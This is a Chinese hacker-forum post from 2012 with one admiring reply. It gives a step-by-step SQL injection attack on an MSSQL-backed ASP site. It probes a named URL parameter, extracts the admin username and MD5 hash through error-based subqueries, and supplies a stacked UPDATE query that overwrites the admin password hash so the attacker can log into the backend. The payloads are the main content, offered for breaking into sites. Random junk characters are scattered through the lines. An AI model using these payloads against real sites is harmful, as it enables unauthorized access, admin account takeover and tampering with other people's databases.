找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2355|回复: 1
打印 上一主题 下一主题

SQL注入直接修改管理员密码的MD5值

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:55:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。, q$ f: q5 h9 b% O$ X
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
6 t6 K: d7 ?. S" b1 L- o: c测试如下:; }- e) x# p1 O/ ?( K
http://www.tmdsb.com/news.asp?id=121: [# x) h/ d4 N. U4 B9 y
在地址后输入单引号,显示% X1 U5 [9 C; k# R4 d0 v
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’/ Q4 f1 A1 ?: F8 G  P0 p7 Z
字符串 ’’’ 之前有未闭合的引号
. X& e6 V  y  ?9 \# q( b5 }/news/tmdws.asp,行63$ f7 ~0 W; F; g8 ~0 T
说明没有过滤单引号且数据库是MSSQL.
% a. N8 q! a" Z! Q9 G( _8 b6 O, pand 1=1正常。and 1=2出错。肯定存在注入; _9 S8 `! [7 x, H3 g
接着输入
# n8 J6 I5 K1 i. n0 y- jhttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
  z2 H$ W2 p7 U8 w, N得到帐号为:admin
# M  O3 N6 o+ ^/ I* a& Uhttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)+ G9 W: g# E5 S" {' _
得到密码为:a4716077c2ba075c
' V/ Y2 }$ D. p接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
# v' r6 T, Y# }4 e  B- R( K. Q命令如下 :
- l# \+ L6 ]+ L. Y) Y4 q! w;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
- J3 a/ z" Z% ?/ j$ G8 B7 X这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的
回复

使用道具 举报

沙发
发表于 2012-9-14 16:22:41 | 只看该作者
没法说  一个字牛
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表